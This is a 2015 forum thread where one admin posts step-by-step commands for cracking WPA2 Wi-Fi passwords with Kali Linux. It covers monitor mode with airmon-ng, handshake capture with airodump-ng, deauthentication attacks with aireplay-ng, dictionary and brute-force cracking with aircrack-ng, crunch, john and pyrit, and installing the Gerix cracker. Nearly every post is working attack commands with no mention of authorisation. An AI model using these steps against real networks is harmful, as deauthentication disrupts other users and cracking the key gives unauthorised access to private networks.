PC & IT SUPPORT MADE EASY FORUM
Would you like to react to this message? Create an account in a few clicks or log in to continue.

WPA2 KALI LINUX WIFI HACKING TEST

Go down

WPA2 KALI LINUX WIFI HACKING TEST Empty WPA2 KALI LINUX WIFI HACKING TEST

Post by jamied_uk 11th December 2015, 00:47

http://lewiscomputerhowto.blogspot.co.uk/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html


Disconnect from all wireless networks, open a Terminal, and type airmon-ng

Type airmon-ng start followed by the interface name of your wireless card. mine is wlan0, so my command would be: airmon-ng start wlan0

airodump-ng -c 10 --bssid 00:14:BF:E0:E8:D5 -w /root/Desktop/ mon0

aireplay-ng –0 2 –a [router bssid] –c [client bssid] mon0


aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap


-a is the method aircrack will use to crack the handshake, 2=WPA method.
-b stands for bssid, replace [router bssid] with the BSSID of the target router, mine is 00:14:BF:E0:E8:D5.
-w stands for wordlist, replace [path to wordlist] with the path to a wordlist that you have downloaded. I have a wordlist called “wpa.txt” in the root folder.
/root/Desktop/*.cap is the path to the .cap file containing the password. The * means wild card in Linux, and since I’m assuming that there are no other .cap files on your Desktop, this should work fine the way it is.

My complete command looks like this:
aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /root/wpa.txt  /root/Desktop/*.cap



crunch 8 8 0123456789 -o pass.lst
jamied_uk
jamied_uk
Admin

Posts : 2952
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

WPA2 KALI LINUX WIFI HACKING TEST Empty Re: WPA2 KALI LINUX WIFI HACKING TEST

Post by jamied_uk 11th December 2015, 01:17

to do this in Kali Linux (second tut)






Code:
sudo airmon-ng



Code:
sudo airmon-ng start wlan0


Code:
sudo airodump-ng mon0

Code:
sudo ifconfig wlan0 down


Code:
sudo airodump-ng -c channel --bssid mac address -w /home/root/Desktop/ mon0

Exit soon as you get a handshake with Ctrl + c

Code:
sudo aireplay-ng -0 5 -a mac address -c handshake mac address -e "ssid name" mon0



put mac address instead of word mac address


Code:
sudo aircrack-ng -a2 -b mac address -w /root/passwords.txt /home/root/Desktop/*.cap
jamied_uk
jamied_uk
Admin

Posts : 2952
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

WPA2 KALI LINUX WIFI HACKING TEST Empty Re: WPA2 KALI LINUX WIFI HACKING TEST

Post by jamied_uk 11th December 2015, 14:38

Using Cowpatty for faster results http://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-with-cowpatty-0148423/

Hardware Recommended are external Alfa WIFI
jamied_uk
jamied_uk
Admin

Posts : 2952
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

WPA2 KALI LINUX WIFI HACKING TEST Empty Re: WPA2 KALI LINUX WIFI HACKING TEST

Post by jamied_uk 11th December 2015, 14:50

jamied_uk
jamied_uk
Admin

Posts : 2952
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

WPA2 KALI LINUX WIFI HACKING TEST Empty Re: WPA2 KALI LINUX WIFI HACKING TEST

Post by jamied_uk 11th December 2015, 16:35

http://www.drchaos.com/breaking-wpa2-psk-with-kali


Code:
airodump-ng mon0 – -bssid 0E:18:1A:36:D6:22 – –channel 36 – –write BreakingWPA2



Code:
The command on  is: aircrack-ng “name of cap file you created” -w “name of your dictionary file”


Code:
aircrack-ng BreakingWPA-01.cap -w password.lst


Deauth!

Code:
aireplay-ng --deauth 0 -a BSSID here mon0
jamied_uk
jamied_uk
Admin

Posts : 2952
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

WPA2 KALI LINUX WIFI HACKING TEST Empty Re: WPA2 KALI LINUX WIFI HACKING TEST

Post by jamied_uk 11th December 2015, 19:13

Use Crunch to make a password list file


Code:
crunch 8 8 1234567890 -o pass.lst
jamied_uk
jamied_uk
Admin

Posts : 2952
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

WPA2 KALI LINUX WIFI HACKING TEST Empty Re: WPA2 KALI LINUX WIFI HACKING TEST

Post by jamied_uk 12th December 2015, 16:34

Code:
john --stdout --incremental:all | aircrack-ng -e ESSID -w - /home/root/input_wpa.cap
jamied_uk
jamied_uk
Admin

Posts : 2952
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

WPA2 KALI LINUX WIFI HACKING TEST Empty Re: WPA2 KALI LINUX WIFI HACKING TEST

Post by jamied_uk 12th December 2015, 19:59

jamied_uk
jamied_uk
Admin

Posts : 2952
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

WPA2 KALI LINUX WIFI HACKING TEST Empty Re: WPA2 KALI LINUX WIFI HACKING TEST

Post by jamied_uk 14th December 2015, 19:33

GPU CRUNCH AIRECRACK-NG HACKING

Code:
crunch 10 10 abcdefghijklmnopqrstuvwxyz0123456789 | pyrit -r test-01.cap -b 00:00:00:00:00:00 -i - attack_passthrough
jamied_uk
jamied_uk
Admin

Posts : 2952
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

WPA2 KALI LINUX WIFI HACKING TEST Empty Re: WPA2 KALI LINUX WIFI HACKING TEST

Post by jamied_uk 15th December 2015, 17:17

Another site that describes how to make sessions so that you can pause and resume cracking

http://www.shellhacks.com/en/HowTo-Pause-Resume-Aircrack-ng

Code:
john --session=foo --stdout --wordlist=wordlist.dic | aircrack-ng -w - -b 00:11:22:33:44:55 WPAcrack.cap



Code:
john --restore=foo | aircrack-ng -w - -b 00:11:22:33:44:55 WPAcrack.cap


Code:

john –incremental=all –session=WirelessBrute –stdout | aircrack-ng -a 2 -e WirelessNetwork WirelessNetwork-01.cap -w -
jamied_uk
jamied_uk
Admin

Posts : 2952
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

WPA2 KALI LINUX WIFI HACKING TEST Empty Re: WPA2 KALI LINUX WIFI HACKING TEST

Post by jamied_uk 19th December 2015, 11:43

1. Using wget, navigate to the following website to download Gerix.
wget https://bitbucket.org/Skin36/gerix-wifi-cracker-pyqt4/
downloads/gerix-wifi-cracker-master.rar
2. Once the fi le has been downloaded, we now need to extract the data from the
RAR fi le.
unrar x gerix-wifi-cracker-master.rar
3. Now, to keep things consistent, let's move the Gerix folder to the /usr/share
directory with the other penetration testing tools.
mv gerix-wifi-cracker-master /usr/share/gerix-wifi-cracker
4. Let's navigate to the directory where Gerix is located.
cd /usr/share/gerix-wifi-cracker
5. To begin using Gerix, we issue the following command:
python gerix.py



https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwjW4o7N6-fJAhUFLhoKHeg7Dv4QFgggMAA&url=https%3A%2F%2Fwww.packtpub.com%2Fsites%2Fdefault%2Ffiles%2F9781783289592_Chapter_09.pdf&usg=AFQjCNEgghC3uvIlshM68HeBV2ZwWvttaQ&sig2=jDlPbdNsHzE_21SiNwTMuA
jamied_uk
jamied_uk
Admin

Posts : 2952
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

WPA2 KALI LINUX WIFI HACKING TEST Empty Re: WPA2 KALI LINUX WIFI HACKING TEST

Post by Sponsored content


Sponsored content


Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum